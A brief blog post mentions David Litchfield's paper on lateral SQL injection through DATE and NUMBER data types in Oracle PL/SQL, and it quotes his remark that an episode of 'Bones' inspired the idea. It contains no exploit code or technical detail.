Earlier this year David Litchfield published a paper about what he calls lateral SQL injection (PDF), in which he demonstrates how to exploit PL/SQL procedures that don’t take user input. It’s a rather clever bit of work that shows that data types such as DATE and NUMBER, normally considered safe from injection, are in fact not.

But what caught my attention was his inspiration:

Whilst watching an episode of ‘Bones,’ something happened in it that made me think of not accepting something believed to be true, i.e., in this case that it’s not possible to SQL inject via DATE or NUMBER data types.

I love it.